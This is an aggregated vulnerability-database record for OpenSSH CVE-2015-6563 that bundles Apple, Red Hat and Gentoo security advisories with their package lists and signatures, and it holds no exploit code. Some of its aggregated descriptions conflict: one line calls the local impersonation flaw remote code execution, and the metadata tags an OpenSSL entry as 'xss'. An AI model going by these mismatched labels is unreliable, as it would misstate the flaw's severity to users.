"https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-09-18T00:00:00", "db": "VULHUB", "id": "VHN-135438" }, { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2018-5407" }, { "date": "2023-11-07T02:58:42.920000", "db": "NVD", "id": "CVE-2018-5407" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "PACKETSTORM", "id": "150561" }, { "db": "PACKETSTORM", "id": "169678" } ], "trust": 0.2 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Slackware Security Advisory - openssl Updates", "sources": [ { "db": "PACKETSTORM", "id": "150437" } ], "trust": 0.1 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "xss", "sources": [ { "db": "PACKETSTORM", "id": "155415" } ], "trust": 0.1 } }
var-201508-0112
Vulnerability from variot
The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. OpenSSH (OpenBSD Secure Shell) is a set of connection tools maintained by the OpenBSD project group for secure access to remote computers. This tool is an open source implementation of the SSH protocol, which supports encryption of all transmissions and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. A remote code execution vulnerability exists in OpenSSH. An attacker could use this vulnerability to execute arbitrary code in the context of an affected application and may cause a denial of service. Failed exploit attempts may result in denial-of-service conditions. There is a security vulnerability in the monitor component in the sshd of OpenSSH 6.9 and earlier versions based on non-OpenBSD platforms. The vulnerability is caused by the program incorrectly receiving the external username data in the MONITOR_REQ_PAM_INIT_CTX request. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007
OS X El Capitan 10.11.1 and Security Update 2015-007 are now available and address the following:
Accelerate Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in the Accelerate Framework in multi-threading mode. This issue was addressed through improved accessor element validation and improved object locking. CVE-ID CVE-2015-5940 : Apple
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.29 and 5.4.45. These were addressed by updating PHP to versions 5.5.29 and 5.4.45. CVE-ID CVE-2015-0235 CVE-2015-0273 CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837 CVE-2015-6838
ATS Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted webpage may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in ATS. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team
Audio Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code Description: An uninitialized memory issue existed in coreaudiod. This issue was addressed through improved memory initialization. CVE-ID CVE-2015-7003 : Mark Brand of Google Project Zero
Audio Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Playing a malicious audio file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of audio files. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5933 : Apple CVE-2015-5934 : Apple
Bom Available for: OS X El Capitan 10.11 Impact: Unpacking a maliciously crafted archive may lead to arbitrary code execution Description: A file traversal vulnerability existed in the handling of CPIO archives. This issue was addressed through improved validation of metadata. CVE-ID CVE-2015-7006 : Mark Dowd of Azimuth Security
CFNetwork Available for: OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to cookies being overwritten Description: A parsing issue existed when handling cookies with different letter casing. This issue was addressed through improved parsing. CVE-ID CVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of Tsinghua University, Jian Jiang of University of California, Berkeley, Haixin Duan of Tsinghua University and International Computer Science Institute, Shuo Chen of Microsoft Research Redmond, Tao Wan of Huawei Canada, Nicholas Weaver of International Computer Science Institute and University of California, Berkeley, coordinated via CERT/CC
configd Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to elevate privileges Description: A heap based buffer overflow issue existed in the DNS client library. CVE-ID CVE-2015-7015 : PanguTeam
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in CoreGraphics. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5925 : Apple CVE-2015-5926 : Apple
CoreText Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText Available for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText Available for: OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team
Disk Images Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6995 : Ian Beer of Google Project Zero
EFI Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: An attacker can exercise unused EFI functions Description: An issue existed with EFI argument handling. This was addressed by removing the affected functions. CVE-ID CVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and Sam Cornwell of The MITRE Corporation, coordinated via CERT/CC
File Bookmark Available for: OS X El Capitan 10.11 Impact: Browsing to a folder with malformed bookmarks may cause unexpected application termination Description: An input validation issue existed in parsing bookmark metadata. This issue was addressed through improved validation checks. CVE-ID CVE-2015-6987 : Luca Todesco (@qwertyoruiop)
FontParser Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-5927 : Apple CVE-2015-5942 CVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero Day Initiative CVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team
FontParser Available for: OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team
Grand Central Dispatch Available for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11 Impact: Processing a maliciously crafted package may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of dispatch calls. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6989 : Apple
Graphics Drivers Available for: OS X El Capitan 10.11 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: Multiple out of bounds read issues existed in the NVIDIA graphics driver. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-7019 : Ian Beer of Google Project Zero CVE-2015-7020 : Moony Li of Trend Micro
Graphics Drivers Available for: OS X El Capitan 10.11 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7021 : Moony Li of Trend Micro
ImageIO Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Processing a maliciously crafted image file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the parsing of image metadata. These issues were addressed through improved metadata validation. CVE-ID CVE-2015-5935 : Apple CVE-2015-5938 : Apple
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Processing a maliciously crafted image file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the parsing of image metadata. These issues were addressed through improved metadata validation. CVE-ID CVE-2015-5936 : Apple CVE-2015-5937 : Apple CVE-2015-5939 : Apple
IOAcceleratorFamily Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOAcceleratorFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6996 : Ian Beer of Google Project Zero
IOHIDFamily Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6974 : Luca Todesco (@qwertyoruiop)
Kernel Available for: OS X Yosemite v10.10.5 Impact: A local user may be able to execute arbitrary code with system privileges Description: A type confusion issue existed in the validation of Mach tasks. This issue was addressed through improved Mach task validation. CVE-ID CVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella
Kernel Available for: OS X El Capitan 10.11 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: An uninitialized memory issue existed in the kernel. This issue was addressed through improved memory initialization. CVE-ID CVE-2015-6988 : The Brainy Code Scanner (m00nbsd)
Kernel Available for: OS X El Capitan 10.11 Impact: A local application may be able to cause a denial of service Description: An issue existed when reusing virtual memory. This issue was addressed through improved validation. CVE-ID CVE-2015-6994 : Mark Mentovai of Google Inc.
libarchive Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: A malicious application may be able to overwrite arbitrary files Description: An issue existed within the path validation logic for symlinks. This issue was addressed through improved path sanitization. CVE-ID CVE-2015-6984 : Christopher Crone of Infinit, Jonathan Schleifer
MCX Application Restrictions Available for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11 Impact: A developer-signed executable may acquire restricted entitlements Description: An entitlement validation issue existed in Managed Configuration. A developer-signed app could bypass restrictions on use of restricted entitlements and elevate privileges. This issue was addressed through improved provisioning profile validation. CVE-ID CVE-2015-7016 : Apple
Net-SNMP Available for: OS X El Capitan 10.11 Impact: An attacker in a privileged network position may be able to cause a denial of service Description: Multiple issues existed in netsnmp version 5.6. These issues were addressed by using patches affecting OS X from upstream. CVE-ID CVE-2012-6151 CVE-2014-3565
OpenGL Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in OpenGL. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5924 : Apple
OpenSSH Available for: OS X El Capitan 10.11 Impact: A local user may be able to conduct impersonation attacks Description: A privilege separation issue existed in PAM support. This issue was addressed with improved authorization checks. CVE-ID CVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH
Sandbox Available for: OS X El Capitan 10.11 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: An input validation issue existed when handling NVRAM parameters. This issue was addressed through improved validation. CVE-ID CVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical Institute, Apple
Script Editor Available for: OS X El Capitan 10.11 Impact: An attacker may trick a user into running arbitrary AppleScript Description: In some circumstances, Script Editor did not ask for user confirmation before executing AppleScripts. This issue was addressed by prompting for user confirmation before executing AppleScripts. CVE-ID CVE-2015-7007 : Joe Vennix of Rapid7
Security Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to overwrite arbitrary files Description: A double free issue existed in the handling of AtomicBufferedFile descriptors. This issue was addressed through improved validation of AtomicBufferedFile descriptors. CVE-ID CVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey Ulanov from the Chrome Team
SecurityAgent Available for: OS X El Capitan 10.11 Impact: A malicious application can programmatically control keychain access prompts Description: A method existed for applications to create synthetic clicks on keychain prompts. This was addressed by disabling synthetic clicks for keychain access windows. CVE-ID CVE-2015-5943
Installation note:
OS X El Capitan v10.11.1 includes the security content of Safari 9.0.1: https://support.apple.com/kb/HT205377
OS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWJuKsAAoJEBcWfLTuOo7t8e0P/igVHKDXeLNib2eEzbS2BMVV Ee968BgEDw1xnHK8zzh3bbRNxxAUT9lwe8RuSYECfp8sUYySb51/VIWpmidewsqB az7mJ4Gohldppejc5tykHDoTYesQL7iySLn74PdxZfZXbtz2EGJK19cA6hIHcO5x ZiMCbJzTaAOylKRQRRi3kMdNWEzxbtm90247vNx/zMSjs1bhGlQbJsCVDmX/Q9uH Xja9aPCHDfaQueTw5idbXwT+Y/+I9ytBlL5JXVrjRUDYCtuewC4DNsQxZY0qcDyE A7/0G7iYW5vOECNhpoLA0+1MbdHxJXhwJtmIKX8zucYqe/Vr4j41oGey/HJW55ER USJ2RBpMtGhDEolyvxz7FlSPYOIpp05mwMB0GWQWAmkWDAxnagkQm9xwKBMt4eq4 CNdI0YaX0iPPWYIkI3HpZHdzuwbE5b053cw1hLKc0OVQBiqLUQxe3W5s64ZqTSe0 whlm9lt/9EUwyfXHEiXTYi/d+CF8+JthY4ieXRJ4mwz77udafmgA5Pbl71SqB8pE 7TBByuCOFdou6JmdJPahLDxoGRA+i7Z+a8Myn4WtbemkjrO9iZ/VsdAdl/Db+7cz rEgSPjelEC5z5WxQspiuohxU1NkDnMgWm2Tnx+pFBOfZMheE4xnTfve3vqY+gQdN 4GbuRXld4PbxeDdel0Nk =snJ4 -----END PGP SIGNATURE----- . 6) - i386, x86_64
Security Fix(es):
-
It was found that the OpenSSH client did not properly enforce the ForwardX11Timeout setting. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2015-6564)
-
An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security, bug fix, and enhancement update Advisory ID: RHSA-2015:2088-06 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2088.html Issue date: 2015-11-19 CVE Names: CVE-2015-5600 CVE-2015-6563 CVE-2015-6564 =====================================================================
- Summary:
Updated openssh packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server.
A flaw was found in the way OpenSSH handled PAM authentication when using privilege separation. An attacker with valid credentials on the system and able to fully compromise a non-privileged pre-authentication process using a different flaw could use this flaw to authenticate as other users. (CVE-2015-6563)
A use-after-free flaw was found in OpenSSH. (CVE-2015-6564)
It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600)
It was found that the OpenSSH ssh-agent, a program to hold private keys used for public key authentication, was vulnerable to password guessing attacks. An attacker able to connect to the agent could use this flaw to conduct a brute-force attack to unlock keys in the ssh-agent. (BZ#1238238)
This update fixes the following bugs:
-
Previously, the sshd_config(5) man page was misleading and could thus confuse the user. This update improves the man page text to clearly describe the AllowGroups feature. (BZ#1150007)
-
The limit for the function for restricting the number of files listed using the wildcard character (*) that prevents the Denial of Service (DoS) for both server and client was previously set too low. Consequently, the user reaching the limit was prevented from listing a directory with a large number of files over Secure File Transfer Protocol (SFTP). This update increases the aforementioned limit, thus fixing this bug. (BZ#1160377)
-
When the ForceCommand option with a pseudoterminal was used and the MaxSession option was set to "2", multiplexed SSH connections did not work as expected. After the user attempted to open a second multiplexed connection, the attempt failed if the first connection was still open. This update modifies OpenSSH to issue only one audit message per session, and the user is thus able to open two multiplexed connections in this situation. (BZ#1199112)
-
The ssh-copy-id utility failed if the account on the remote server did not use an sh-like shell. Remote commands have been modified to run in an sh-like shell, and ssh-copy-id now works also with non-sh-like shells. (BZ#1201758)
-
Due to a race condition between auditing messages and answers when using ControlMaster multiplexing, one session in the shared connection randomly and unexpectedly exited the connection. This update fixes the race condition in the auditing code, and multiplexing connections now work as expected even with a number of sessions created at once. (BZ#1240613)
In addition, this update adds the following enhancements:
-
As not all Lightweight Directory Access Protocol (LDAP) servers possess a default schema, as expected by the ssh-ldap-helper program, this update provides the user with an ability to adjust the LDAP query to get public keys from servers with a different schema, while the default functionality stays untouched. (BZ#1201753)
-
With this enhancement update, the administrator is able to set permissions for files uploaded using Secure File Transfer Protocol (SFTP). (BZ#1197989)
-
This update provides the LDAP schema in LDAP Data Interchange Format (LDIF) format as a complement to the old schema previously accepted by OpenLDAP. (BZ#1184938)
-
With this update, the user can selectively disable the Generic Security Services API (GSSAPI) key exchange algorithms as any normal key exchange. (BZ#1253062)
Users of openssh are advised to upgrade to these updated packages, which correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1125110 - pam_namespace usage is not consistent across system-wide PAM configuration 1160377 - sftp is failing using wildcards and many files 1178116 - Default selinux policy prevents ssh-ldap-helper from connecting to LDAP server 1181591 - No Documentation= line in the sshd.service file 1184938 - Provide LDIF version of LPK schema 1187597 - sshd -T does not show all (default) options, inconsistency 1197666 - ssh client using HostbasedAuthentication aborts in FIPS mode 1197989 - RFE: option to let openssh/sftp force the exact permissions on newly uploaded files 1238238 - openssh: weakness of agent locking (ssh-add -x) to password guessing 1245969 - CVE-2015-5600 openssh: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices 1252844 - CVE-2015-6563 openssh: Privilege separation weakness related to PAM support 1252852 - CVE-2015-6564 openssh: Use-after-free bug related to PAM support
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
aarch64: openssh-6.6.1p1-22.el7.aarch64.rpm openssh-clients-6.6.1p1-22.el7.aarch64.rpm openssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm openssh-keycat-6.6.1p1-22.el7.aarch64.rpm openssh-server-6.6.1p1-22.el7.aarch64.rpm
ppc64: openssh-6.6.1p1-22.el7.ppc64.rpm openssh-askpass-6.6.1p1-22.el7.ppc64.rpm openssh-clients-6.6.1p1-22.el7.ppc64.rpm openssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm openssh-keycat-6.6.1p1-22.el7.ppc64.rpm openssh-server-6.6.1p1-22.el7.ppc64.rpm
ppc64le: openssh-6.6.1p1-22.el7.ppc64le.rpm openssh-askpass-6.6.1p1-22.el7.ppc64le.rpm openssh-clients-6.6.1p1-22.el7.ppc64le.rpm openssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm openssh-keycat-6.6.1p1-22.el7.ppc64le.rpm openssh-server-6.6.1p1-22.el7.ppc64le.rpm
s390x: openssh-6.6.1p1-22.el7.s390x.rpm openssh-askpass-6.6.1p1-22.el7.s390x.rpm openssh-clients-6.6.1p1-22.el7.s390x.rpm openssh-debuginfo-6.6.1p1-22.el7.s390x.rpm openssh-keycat-6.6.1p1-22.el7.s390x.rpm openssh-server-6.6.1p1-22.el7.s390x.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: openssh-askpass-6.6.1p1-22.el7.aarch64.rpm openssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm openssh-ldap-6.6.1p1-22.el7.aarch64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.aarch64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.aarch64.rpm
ppc64: openssh-debuginfo-6.6.1p1-22.el7.ppc.rpm openssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm openssh-ldap-6.6.1p1-22.el7.ppc64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.ppc.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.ppc64.rpm
ppc64le: openssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm openssh-ldap-6.6.1p1-22.el7.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-22.el7.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.ppc64le.rpm
s390x: openssh-debuginfo-6.6.1p1-22.el7.s390.rpm openssh-debuginfo-6.6.1p1-22.el7.s390x.rpm openssh-ldap-6.6.1p1-22.el7.s390x.rpm openssh-server-sysvinit-6.6.1p1-22.el7.s390x.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.s390.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.s390x.rpm
x86_64: openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-5600 https://access.redhat.com/security/cve/CVE-2015-6563 https://access.redhat.com/security/cve/CVE-2015-6564 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWTj/BXlSAg2UNWIIRAgIEAJ4+Nlu4NsYtiDloNVrVn2F/vT/9kACdEHqE h3XwDOy3+OSs/h1DEpVBtV0= =x/s+ -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201512-04
https://security.gentoo.org/
Severity: Normal Title: OpenSSH: Multiple vulnerabilities Date: December 20, 2015 Bugs: #553724, #555518, #557340 ID: 201512-04
Synopsis
Multiple vulnerabilities have been found in OpenSSH, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition. Please review the CVE identifiers referenced below for details.
Impact
Workaround
There is no known workaround at this time.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-6.9_p1-r2"
References
[ 1 ] CVE-2015-5352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352 [ 2 ] CVE-2015-5600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600 [ 3 ] CVE-2015-6563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563 [ 4 ] CVE-2015-6564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564 [ 5 ] CVE-2015-6565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201512-04
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
